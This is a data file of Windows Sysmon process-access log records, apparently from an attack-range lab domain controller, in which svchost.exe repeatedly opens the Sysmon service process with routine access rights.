{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1530,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1531,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1532,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1533,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1534,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1535,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1536,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1537,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
